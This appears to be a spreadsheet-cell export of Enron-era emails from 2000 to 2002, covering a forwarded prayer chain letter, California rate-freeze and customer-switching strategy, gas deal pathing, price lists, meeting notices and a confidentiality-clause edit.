To:	Hargrave, Michelle; Metoyer, Pam; Lacey, Lena; Thelma Crider (E-mail); McMahon, Kathy; Ruiz, Kayla; Stuart, Charla; Danz, Suzanne; Street, Karen; Taylor, Grace_x000D_
Subject:	RE: FW: I had you on my heart_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hargrave, Michelle  _x000D_
Sent:	Friday, October 12, 2001 11:56 AM_x000D_
To:	Jordan, Jennifer; Barrett, Joyce; Knight, Brinnella; Lessor, Mary; Bob, Vanessa; Milligan, Jennifer; Stuart, Charla; Parra, Veronica; Ratliff, Vance_x000D_
Subject:	FW: FW: I had you on my heart_x000D_
_x000D_
A little blessing for my friends....._x000D_
_x000D_
 _x000D_
  I HAD YOU ON MY HEART_x000D_
_x000D_
  I asked the Lord to bless you_x000D_
  As I prayed for you today_x000D_
  To guide you and protect you_x000D_
  As you go along your way...._x000D_
  His love is always with you,_x000D_
  His promises are true,_x000D_
  And when we give Him all our cares_x000D_
  You know He will see us through_x000D_
  So when the road you're traveling on_x000D_
  Seems difficult at best_x000D_
  Just remember I'm here praying_x000D_
  And God will do the rest._x000D_
_x000D_
  Pass this to at least 10 people you want God to bless and don't forget to_x000D_
send it back to the one who ask God to bless you first._x000D_
_x000D_
  This email was cleaned by emailStripper, available for free from_x000D_
http://www.printcharger.com/emailStripper.htm_x000D_
_x000D_
_x000D_
 - Part.001 &lt;&lt; File: Part.001 &gt;&gt; </t>
  </si>
  <si>
    <t>Sun, 7 Jan 2001 04:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks, Harry.  I want to re-enforce the switching issue, since EES is likely _x000D_
to be very focused on moving customers back to the utility on Tuesday.  _x000D_
Switching would certainly reduce EES' going-forward exposure to 1) growing _x000D_
"credit receivables" that the utilities refuse to pay and 2) the risk that _x000D_
the Commission will end the rate freeze altogether---and the PX credit with _x000D_
it--as part of the hearing process that commences with the pre-hearing _x000D_
conference on Wednesday.  Reducing that exposure is clealry important to EES._x000D_
_x000D_
But the utilities' ability to resist taking back customers is likely to be _x000D_
significant, particularly since 90% of the volumes that we serve are on Enron _x000D_
meters.  Imagine the road blocks that the utility can/will construct over the _x000D_
"complex process"  of changing-out the meters.  In addition, when CA border _x000D_
gas prices spiked several weeks ago, many large gas customers tried to switch _x000D_
from noncore to core service on SoCalGas' system.  SoCalGas submitted an _x000D_
emergency motion at the Commission to prevent the switching and the _x000D_
Commission granted it in the wink of an eye._x000D_
_x000D_
It will be important for EES to drill down fairly deeply in its analysis of _x000D_
all the ways that the utility can frustrate any switching.  Otherwise, we may _x000D_
find ourselves confronting a lot of negative PR without having reduced any of _x000D_
EES' exposure.  Customers who have been unwillingly switched back to the _x000D_
utility have become very vocal about their displeasure and have turned _x000D_
negative on ESPs as a result._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Harry Kingerski_x000D_
	01/07/2001 11:21 AM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Mark S _x000D_
Palmer/Enron Communications@Enron Communications_x000D_
		 cc: Jeff Dasovich/NA/Enron@Enron, James D Steffes/NA/Enron@Enron_x000D_
		 Subject: _x000D_
_x000D_
These 3 issues will be discussed at your Tuesday afternoon meeting with EES:_x000D_
_x000D_
what to do about forcing the utilities to pay delinquent PX credits_x000D_
Through December, the total arrearage is about $220M total, mostly from _x000D_
PG&amp;E.  Neither utility is paying.  Vicki Sharpe is lining up bankruptcy _x000D_
counsel._x000D_
_x000D_
should the new 1 cent surcharge be passed on to our customers_x000D_
Vicki has not said yet whether our contracts allow passthrough, although she _x000D_
has hinted it would require a very aggressive interpretation of the contract._x000D_
 _x000D_
should we try to return our customers to utility bundled service_x000D_
Aside from the modifications to our customer contracts that have to take _x000D_
place, an even stickier issue is to get the utilities to take them back.  _x000D_
Even if the utilities are required to do so, forms have to be processed and _x000D_
meters have to be changed out.  (We have our own meters on our accounts.)  _x000D_
This could not happen quickly.  Of course, this action mitigates against the _x000D_
risk of the rate freeze ending but does nothing for the credit problem, other _x000D_
than to keep the exposure from getting larger._x000D_
_x000D_
On Wednesday, there will be a pre-hearing conference at the CPUC on the next _x000D_
phase of the end-the-rate-freeze case.  Jeff and I have talked about this and _x000D_
think we can decide what our involvement will be (witnesses, positions, etc.) _x000D_
after a schedule is set.  For now, the strategy is to make sure the CPUC on _x000D_
Wednesday adopts a schedule that deals with all the issues they must deal _x000D_
with about the rate freeze. _x000D_
_x000D_
(Rick, I will be in San Francisco through Wednesday meeting with Mike Day and _x000D_
working with Roger Yang to identify all those issues.)_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Oct 2000 06:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michelle.lokay@enron.com', 'lorraine.lindberg@enron.com'})</t>
  </si>
  <si>
    <t>Nutcracker</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Audrey Robertson/ET&amp;S/Enron on 10/06/2000 _x000D_
01:57 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  TK Lohman                           10/06/2000 11:14 AM_x000D_
	_x000D_
_x000D_
To: Audrey Robertson/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Nutcracker_x000D_
_x000D_
Michelle Felhman will not be able to attend._x000D_
_x000D_
Thanks,_x000D_
_x000D_
TK_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 14:08:33 -0800 (PST)</t>
  </si>
  <si>
    <t>Employee Meeting Tapes Released</t>
  </si>
  <si>
    <t>You might already know this, but: MSNBC just played a video tape of the last all-employee meeting and included the "Are you on drugs" question of Ken Lay._x000D_
_x000D_
Dave</t>
  </si>
  <si>
    <t>Thu, 31 Jan 2002 05:37:19 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/31/02; HourAhead hour: 4;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/31/02; HourAhead hour: 4;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002013104.txt</t>
  </si>
  <si>
    <t>Wed, 14 Feb 2001 09:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Levitan &amp;  Associates</t>
  </si>
  <si>
    <t>Mon, 18 Mar 2002 16:10:50 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tdowe@houston.org'})</t>
  </si>
  <si>
    <t>Women's Energy Network-Houston (WENH) March Luncheon</t>
  </si>
  <si>
    <t xml:space="preserve">Dear WENH Members and Friends:_x000D_
_x000D_
Please plan to join the Women's Energy Network of Houston (WENH) for_x000D_
lunch at Brennan's on Thursday, April 11, 2002, featuring guest speaker,_x000D_
Cathy Wining Thomas, energy industry consultant, and former Chief_x000D_
Procurement Officer (CPO) and General Manager of Materials and Services_x000D_
at Conoco._x000D_
_x000D_
Reservation information is attached.  Please visit  www.wenhouston.org_x000D_
to read the latest newsletter and learn about upcoming WENH events._x000D_
_x000D_
To streamline communications and to better serve you, WENH will soon_x000D_
distribute correspondence such as this via the WENH website, complete_x000D_
with a unique WENH e-mail address._x000D_
_x000D_
Thank you very much for your support and involvement._x000D_
_x000D_
 &lt;&lt;WENH April 2002 lunch notice.doc&gt;&gt; _x000D_
_x000D_
Best regards,_x000D_
_x000D_
Tammy Dowe_x000D_
Vice President_x000D_
Women's Energy Network of Houston_x000D_
WENH contact phone:  713.504.1778_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 04:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stephen.plauche@enron.com'})</t>
  </si>
  <si>
    <t>Preliminary Spec with Spare Parts</t>
  </si>
  <si>
    <t xml:space="preserve">FYI..._x000D_
_x000D_
SP_x000D_
---------------------- Forwarded by Stephen Plauche/Corp/Enron on 11/28/2000 _x000D_
12:21 PM ---------------------------_x000D_
_x000D_
_x000D_
"Leo, Tony" &lt;tleo@fce.com&gt; on 11/28/2000 08:36:25 AM_x000D_
To: "Leo, Tony" &lt;tleo@fce.com&gt;, "''Stephen.Plauche@enron.com' '" _x000D_
&lt;Stephen.Plauche@enron.com&gt;, "''Scott.Healy@enron.com' '" _x000D_
&lt;Scott.Healy@enron.com&gt;, "''Terri.Austin@enron.com' '" _x000D_
&lt;Terri.Austin@enron.com&gt;_x000D_
cc: "Levine, Ross" &lt;rlevine@fce.com&gt;, "Skok, Andy" &lt;askok@fce.com&gt;, "Bentley, _x000D_
Chris" &lt;cbentley@fce.com&gt;, "Nock, Herb" &lt;HNock@FCE.com&gt;, "''Jacqueline _x000D_
Scheib' '" &lt;jscheib@rc.com&gt; _x000D_
_x000D_
Subject: Preliminary Spec with Spare Parts_x000D_
_x000D_
_x000D_
_x000D_
Attached file is a new version of the preliminary spec, with added language_x000D_
on initial spare parts._x000D_
_x000D_
_x000D_
 - Preliminary Specification with Spares.doc_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Jan 2001 01:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jim.meyn@enron.com', 'eric.moon@enron.com', 'mark.bernstein@enron.com', 'john.griffith@enron.com', 'eric.boyt@enron.com'})</t>
  </si>
  <si>
    <t>Co-Op City Benchmark Meeting</t>
  </si>
  <si>
    <t>Date: Today, Wednesday 1/17/01_x000D_
Time: 2-3 PM_x000D_
Room: EB 3143b_x000D_
Topic: Benchmark Discussion with Research_x000D_
_x000D_
Please call me with any questions._x000D_
_x000D_
John House</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 15:20:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rick.dietz@enron.com', 'larry.berger@enron.com'})</t>
  </si>
  <si>
    <t>RE: NNG Flowing Gas Documents</t>
  </si>
  <si>
    <t xml:space="preserve">    I am fine with your explanation as well.  Is anyone complaining about only one person being able to_x000D_
    view the info?  Thanks. Lynn_x000D_
_x000D_
-----Original Message-----_x000D_
From: Dietz, Rick _x000D_
Sent: Tuesday, October 16, 2001 5:13 PM_x000D_
To: Berger, Larry; Blair, Lynn_x000D_
Subject: RE: NNG Flowing Gas Documents_x000D_
_x000D_
_x000D_
Thanks for the clarification, Larry.  I don't think we need to meet to discuss this issue.  I guess that I just misunderstood your initial message to imply that certain documents were still unaccessible to customers.  I'm satisfied._x000D_
 _x000D_
Rick_x000D_
_x000D_
-----Original Message----- _x000D_
From: Berger, Larry _x000D_
Sent: Tue 10/16/2001 10:01 AM _x000D_
To: Blair, Lynn; Dietz, Rick _x000D_
Cc: _x000D_
Subject: RE: NNG Flowing Gas Documents_x000D_
_x000D_
_x000D_
_x000D_
Rick and Lynn, _x000D_
_x000D_
A customer can access all of NNG accounting documents( all invoices and their supporting documents).  However, due to tighter security coding in Business Objects compare to Actuate, reports are now only viewable by one party, instead of two parties. For example, at a poi where there is an agent and an operator, the agent is only able to view the Measurement Info, Daily Volume Allocation and Allocation statements.   IT is researching a fix to a situation like this._x000D_
_x000D_
If you still would like to meet with me to explain further, give a demo (or have  lunch meeting with just the three of us!), let me know._x000D_
_x000D_
Thanks _x000D_
Larry _x000D_
_x000D_
_x000D_
 -----Original Message----- _x000D_
From:   Blair, Lynn  _x000D_
Sent:   Monday, October 15, 2001 6:30 AM _x000D_
To:     Dietz, Rick; Berger, Larry; Garcia, Ava _x000D_
Subject:        RE: NNG Flowing Gas Documents _x000D_
_x000D_
        Ava, please coordinate with Alma a time Rick, Larry and I can talk about the _x000D_
        flowing gas documents no accessible to customers.  Thanks. Lynn _x000D_
_x000D_
 -----Original Message----- _x000D_
From:   Dietz, Rick  _x000D_
Sent:   Sunday, October 14, 2001 11:03 AM _x000D_
To:     Berger, Larry; Blair, Lynn _x000D_
Subject:        RE: NNG Flowing Gas Documents _x000D_
_x000D_
I am very glad to hear that the key documents are up, running and accessible.  I would like to discuss the documents that the customers cannot access.  I would like to totally focus on the new contract system on Monday so Tuesday would fit my schedule better._x000D_
_x000D_
Rick _x000D_
_x000D_
 -----Original Message----- _x000D_
From:   Berger, Larry  _x000D_
Sent:   Friday, October 12, 2001 9:11 AM _x000D_
To:     Dietz, Rick; Blair, Lynn _x000D_
Cc:     Berger, Larry _x000D_
Subject:        NNG Flowing Gas Documents _x000D_
_x000D_
Rick and Lynn, _x000D_
_x000D_
I just wanted to give you an official memo that the NNG Flowing Gas Documents are now online with both the Reservation, Commodity, Variance and Imbalance invoices and their supporting documents.  NNG Customers are able to view both the Aug and Sep 2001 accounting month reports.  The customer can also view the 5 original Flowing Gas documents (Contract Imbalance, Shipper Imbalance, Invoices (Reservation and Commodity only), Allocation, and Measurement Information) from May 2000 to Aug 2001 accounting months via a hyperlink to Actuate._x000D_
_x000D_
During the next couple of months, I will still be working with the NNG reps and customers on various issues regarding the Flowing Gas reports: for instance, researching why the customer cannot access certain documents.   I will also be meeting with Legale and IT weekly on enhancements to Flowing Gas that are needed._x000D_
_x000D_
See me if you have questions. _x000D_
_x000D_
Larry </t>
  </si>
  <si>
    <t>Wed, 3 Oct 2001 00:00:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>This warning is sent automatically to inform you that your mailbox is approaching the maximum size limit._x000D_
Your mailbox size is currently 77876 KB._x000D_
_x000D_
Mailbox size limits:_x000D_
_x000D_
	When your mailbox reaches 75000 KB you will receive this message.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Mon, 27 Aug 2001 12:23:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'carries@tradefairgroup.com'})</t>
  </si>
  <si>
    <t>Natural Gas Infrastructure Committee Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
August 27, 2001_x000D_
_x000D_
 _x000D_
_x000D_
Hello Natural Gas Infrastructure Committee Members:_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
I wanted to take a quick poll and see how your calendars are looking for the third week of September.  Since there are several committee members that are located in Houston, TX., we would like to schedule a meeting in Houston the third week of September for the Natural Gas Infrastructure Committee.  This meeting will probably be a lunch meeting, from 11:00 a.m. - 1:00 p.m. at a hotel in the Galleria area.  _x000D_
_x000D_
Please reply back indicating your preference for one of these meeting dates:_x000D_
_x000D_
Tuesday, September 18_x000D_
_x000D_
Wednesday, September 19_x000D_
_x000D_
Thursday, September 20 _x000D_
_x000D_
If you have any suggestions or know anyone that may be interested in participating on the Natural Gas Infrastructure committee, please email or call me at (713) 463-9595 x 307. I'll be happy to send an invitation on your behalf.  _x000D_
_x000D_
For your review, please see the minutes and worksheets for NGI attached to this email.  _x000D_
_x000D_
Thanks for your participation on the committee.  We will be getting back with you soon as to the exact date, time and location of the next meeting scheduled for September in Houston.  Have a nice day!_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Carrie Shapiro, Conference Manager_x000D_
_x000D_
_x000D_
Electric Power 2002 Conference &amp; Exhibition_x000D_
_x000D_
_x000D_
% The TradeFair Group_x000D_
_x000D_
1220 Blalock, Suite 310_x000D_
_x000D_
Houston, TX. 77055_x000D_
_x000D_
(713) 463-9595 x 307_x000D_
_x000D_
(713) 463-9997 fax_x000D_
_x000D_
carries@tradefairgroup.com &lt;mailto:carries@tradefairgroup.com&gt; &lt;http://www.e-procomseries.com/&gt; _x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 05:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeanie.slone@enron.com'})</t>
  </si>
  <si>
    <t>RE: Part-Time Positions</t>
  </si>
  <si>
    <t>Sorry, can't do it on Thursday, but what about Friday sometime?</t>
  </si>
  <si>
    <t>Wed, 27 Sep 2000 07:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.cousino@enron.com'})</t>
  </si>
  <si>
    <t>A/R Question on Counterparties for Delainey report</t>
  </si>
  <si>
    <t xml:space="preserve">Sally - I checked into the number of counterparties that we included in the _x000D_
A/R balances that were being reconciled.  It is 4 as stated below.  Please _x000D_
let me know if you need anything else.  I did deliver copies of they July and _x000D_
August report to Tammie Shepherd._x000D_
_x000D_
Lisa_x000D_
_x000D_
---------------------- Forwarded by Lisa B Cousino/HOU/ECT on 09/27/2000 _x000D_
02:11 PM ---------------------------_x000D_
_x000D_
_x000D_
Brian Heinrich_x000D_
09/27/2000 01:11 PM_x000D_
To: Lisa B Cousino/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Question - Delaney Report_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Brian Heinrich/HOU/ECT on 09/27/2000 _x000D_
01:11 PM ---------------------------_x000D_
To: Audrey Cook/HOU/ECT@ECT_x000D_
cc: Brian Heinrich/HOU/ECT@ect _x000D_
Subject: Re: Question - Delaney Report  _x000D_
_x000D_
Actually, counting the monetized counterparty that we lumped in it would be 4 _x000D_
counterparties._x000D_
_x000D_
_x000D_
_x000D_
Audrey Cook_x000D_
09/26/2000 02:42 PM_x000D_
To: Brian Heinrich/HOU/ECT@ect_x000D_
cc: Bryce Baxter/HOU/ECT@ECT _x000D_
Subject: Question - Delaney Report_x000D_
_x000D_
Brian,_x000D_
The answer to your question regarding the number of counterparties in _x000D_
"reconciliation status" on the Delaney Report is 3.  Let me know if you have _x000D_
any further questions.  Thanks_x000D_
ajc_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Mar 2000 01:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CES Daily March Requirements for 3/22 and after</t>
  </si>
  <si>
    <t>Please find attached the CES daily volume requirements for 3/22 and beyond for_x000D_
March._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Doug Kinney_x000D_
Ph:  703-561-6339_x000D_
Fax:  703-561-7317_x000D_
_x000D_
 - 03-22-00 daily volsAM.xls</t>
  </si>
  <si>
    <t>Tue, 11 Jan 2000 01:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'paula.rieker@enron.com'})</t>
  </si>
  <si>
    <t>Paula,_x000D_
_x000D_
Congratulations. Well deserved._x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 06:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ozzie.pagan@enron.com', 'rogers.herndon@enron.com', 'reagan.rorschach@enron.com', 'janet.dietrich@enron.com', 'chris.booth@enron.com', 'tom.chapman@enron.com', 'donna.fulton@enron.com', 'steven.krimsky@enron.com', 'george.mccormick@enron.com', 'sarah.novosel@enron.com', 'bill.moore@enron.com', 'dan.staines@enron.com', 'dave.kellermeyer@enron.com', 'greg.krause@enron.com', 'heather.kroll@enron.com', 'ron.tapscott@enron.com', 'steve.montovano@enron.com', 'marchris.robinson@enron.com', 'david.delainey@enron.com', 'debbie.chance@enron.com', 'michelle.zhang@enron.com', 'jeff.williams@enron.com', 'richard.shapiro@enron.com', 'rusty.stevens@enron.com', 'jeff.brown@enron.com', 'steven.kean@enron.com', 'jeffrey.keenan@enron.com', 'ron.mcnamara@enron.com', 'david.fairley@enron.com', 'janine.migden@enron.com', 'shelley.corman@enron.com', 'bill.rust@enron.com', 'linda.lawrence@enron.com', 'mathew.gimble@enron.com', 'rebecca.walker@enron.com', 'robin.kittel@enron.com', 'john.forney@enron.com', 'raimund.grube@enron.com', 'ben.jacoby@enron.com', 'joseph.wagner@enron.com', 'james.steffes@enron.com', 'john.moore@enron.com', 'john.lavorato@enron.com', 'w.duran@enron.com', 'wjennin@enron.com', 'fred.mitro@enron.com', 'elizabeth.johnston@enron.com', 'joe.connor@enron.com', 'joe.hartsoe@enron.com', 'ray.hoppe@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>EPMI protest of FPL/Entergy merger</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is our brief protest of the merger asking FERC to condition approval _x000D_
on FPL and Entergy joining viable RTOs that include a real time energy market _x000D_
and transmission type/congestion hedging tools (we cite to our previously _x000D_
filed protests of Entergy and FPL's market based rates).  We also ask that a _x000D_
grid operator (MISO or PJM) be established over the entities to the extent _x000D_
that they are not in a viable fully functioning RTO by the merger approval _x000D_
date.   We also reserve our right to file additional data on problems with _x000D_
the merger, if necessary._x000D_
_x000D_
---------------------- Forwarded by Christi L Nicolay/HOU/ECT on 01/31/2001 _x000D_
02:01 PM ---------------------------_x000D_
_x000D_
 - 0137413.01_x000D_
</t>
  </si>
  <si>
    <t>Wed, 12 Apr 2000 00:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'katherine.kelly@enron.com'})</t>
  </si>
  <si>
    <t>Re: Devonian Resources</t>
  </si>
  <si>
    <t xml:space="preserve">Could you get Terry authorization to path in Unify please?_x000D_
_x000D_
Thanks_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 04/12/2000 07:03 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
MARY THERESA FRANKLIN_x000D_
04/11/2000 05:00 PM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc: Gloria G Barkowsky/HOU/ECT@ECT, Angie Zeman/Corp/Enron@ENRON _x000D_
Subject: Re: Devonian Resources  _x000D_
_x000D_
I assume Angie will path these... I don't have authorization.   (Please _x000D_
note... I'm out of here, see ya a week from tomorrow)_x000D_
_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
04/11/2000 01:14 PM_x000D_
To: Gloria G Barkowsky/HOU/ECT@ECT, Mary Theresa Franklin/HOU/ECT@ECT, Angie _x000D_
Zeman/Corp/Enron@ENRON_x000D_
cc: Brent A Price/HOU/ECT@ECT _x000D_
Subject: Re: Devonian Resources  _x000D_
_x000D_
OK.  Now either Mary Theresa Franklin or Angie needs to path out this deal in _x000D_
Unify with a zero volume._x000D_
_x000D_
_x000D_
_x000D_
Gloria G Barkowsky_x000D_
04/11/2000 12:42 PM_x000D_
To: Chris Germany/HOU/ECT@ECT, Angie Zeman/Corp/Enron@ENRON, Mary Theresa _x000D_
Franklin/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Devonian Resources  _x000D_
_x000D_
contract               mid                 acct              producer _x000D_
_x000D_
8G1064             5089201        RP2109406         Devonian_x000D_
8G1064             5105901        AT5105901         Devonian_x000D_
8G1064             5118301        AT5118301         Devonian_x000D_
                _x000D_
Here they are - sorry it took so long to find.  Thanks, Gloria 3-7118_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
04/04/2000 03:35 PM_x000D_
To: Gloria G Barkowsky/HOU/ECT@ECT, Wade R Price/HOU/ECT@ECT_x000D_
cc: John M Singer/Corp/Enron@ENRON, Mary Theresa Franklin/HOU/ECT@ECT, Angie _x000D_
Zeman/Corp/Enron@ENRON, Victor Lamadrid/HOU/ECT@ECT _x000D_
Subject: Re: Devonian Resources_x000D_
_x000D_
OK this is metered production on CNG._x000D_
_x000D_
Gloria will let us know which CNG contract to path this deal with._x000D_
The meter numbers are 50089201, 5105901, and 5118301 and this is CES _x000D_
production._x000D_
_x000D_
After Gloria lets us know which contract(s) to use, Angie will path this deal _x000D_
in Sitara with a zero volume._x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 04/04/2000 02:42 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  John M Singer @ ENRON                           04/04/2000 02:31 PM_x000D_
	_x000D_
_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Devonian Resources  _x000D_
_x000D_
I believe that this is metered production.  We hav a fixed price contract _x000D_
through Aug00._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Chris Germany@ECT_x000D_
04/04/2000 01:59 PM_x000D_
To: John M Singer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Devonian Resources  _x000D_
_x000D_
If this is metered production then its not cut (it just flows to the pool).  _x000D_
If its pool gas then it probably is cut, so you tell me.  Metered production _x000D_
or pool gas on CNG?_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  John M Singer @ ENRON                           04/04/2000 01:39 PM_x000D_
	_x000D_
_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Devonian Resources  _x000D_
_x000D_
Why was this gas cut??_x000D_
_x000D_
My Phone number is 330-493-7790._x000D_
_x000D_
John_x000D_
_x000D_
_x000D_
_x000D_
Chris Germany@ECT_x000D_
04/04/2000 01:01 PM_x000D_
To: John M Singer/Corp/Enron@ENRON_x000D_
cc: Angie Zeman/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Devonian Resources_x000D_
_x000D_
I took the volume on deal 226742 (Devonian Resources) to 0 for April.  _x000D_
_x000D_
Hey John, give me a call when you get a chance so we can chat about this.  _x000D_
Also, send me your phone number.  I can't find it._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Mar 2000 06:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tjfarmer@juno.com'})</t>
  </si>
  <si>
    <t>iNCOME TAX</t>
  </si>
  <si>
    <t xml:space="preserve">Hey Sweet Baby!_x000D_
_x000D_
Can you answer this?_x000D_
_x000D_
I love you._x000D_
---------------------- Forwarded by Daren J Farmer/HOU/ECT on 03/06/2000 _x000D_
02:32 PM ---------------------------_x000D_
_x000D_
_x000D_
"pam farmer" &lt;fpam_@hotmail.com&gt; on 03/06/2000 02:09:20 PM_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: iNCOME TAX_x000D_
_x000D_
_x000D_
_x000D_
HEY! Tonya said to staple copy B of the W-2 to the tax return--But on the_x000D_
one from camp it says Copy C for payer or State Copy, Copy B for Recipient_x000D_
(Keep for your records).  So which one do I send?  The one from the school_x000D_
says send B but I'm confused on the other one._x000D_
What did the doctor say about Tonya &amp; the due date? Love, Ma_x000D_
_______________________________________________________x000D_
Get Your Private, Free Email at http://www.hotmail.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Feb 2001 06:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'j.nassos@pecorp.com'})</t>
  </si>
  <si>
    <t>Re: Confidentiaility Agreements regarding enovate</t>
  </si>
  <si>
    <t xml:space="preserve">Hi John,_x000D_
_x000D_
The enovate version looks fine.  I suggest this change to the Peoples versi=_x000D_
on:_x000D_
_x000D_
iv) is required to be disclosed to comply with any applicable law, order,=_x000D_
=20_x000D_
regulation or ruling or to enforce enovate=01,s or PMW=01,s rights in court=_x000D_
 or in=20_x000D_
an arbitration proceeding in connection with the Limited Liability Company=_x000D_
=20_x000D_
Agreement of envoate dated April 26, 2000, as amended, modified, and=20_x000D_
supplemented from time to time (the =01&amp;LLC Agreement=018). If PEC is reque=_x000D_
sted or=20_x000D_
required (by oral question, interrogatories, requests for information or=20_x000D_
documents, subpoena, civil investigative demand or similar process) to=20_x000D_
disclose any Confidential Information, PEC will promptly notify ENA of such=_x000D_
=20_x000D_
request or requirement so that ENA may seek an appropriate protective order=_x000D_
=20_x000D_
or waiver in compliance with provisions of this Agreement.  If PEC and ENA=_x000D_
=20_x000D_
are both parties to the proceeding, PEC will agree to an appropriate=20_x000D_
protective order._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 05:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stevens_hollister@eott.com'})</t>
  </si>
  <si>
    <t>Re: Gas Daily Prices for Bazor Ridge</t>
  </si>
  <si>
    <t xml:space="preserve">Here are the Gas Daily prices for Sonat on the days of allocated flow:_x000D_
_x000D_
10/12 --  101 mmbtu @ $5.135_x000D_
10/20 --    62 mmbtu @ $5.02_x000D_
10/24 --    63 mmbtu @ $4.81_x000D_
10/25 --    52 mmbtu @ $4.835_x000D_
10/26 --  377 mmbtu @ $4.64_x000D_
10/27 --  371 mmbtu @ $4.60_x000D_
10/28 --  538 mmbtu @ $4.475_x000D_
10/29 --    84 mmbtu @ $4.475_x000D_
_x000D_
Let me know if you need any more info._x000D_
_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Stevens_Hollister@eott.com on 11/06/2000 08:18:31 AM_x000D_
To: "Susan W Pereira" &lt;Susan.W.Pereira@enron.com&gt;_x000D_
cc: Dan_Cole@eott.com _x000D_
Subject: Gas Daily Prices for Bazor Ridge_x000D_
_x000D_
_x000D_
_x000D_
Susan,_x000D_
_x000D_
There was a small amount of gas sold from the Kahuna Gas plant in October._x000D_
I have spoken with Joe Casa with Enron and he is going to provide volumes._x000D_
Can you please provide me the October pricing or give me the name of_x000D_
someone who can?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Stevens_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Dec 2001 10:00:07 -0800 (PST)</t>
  </si>
  <si>
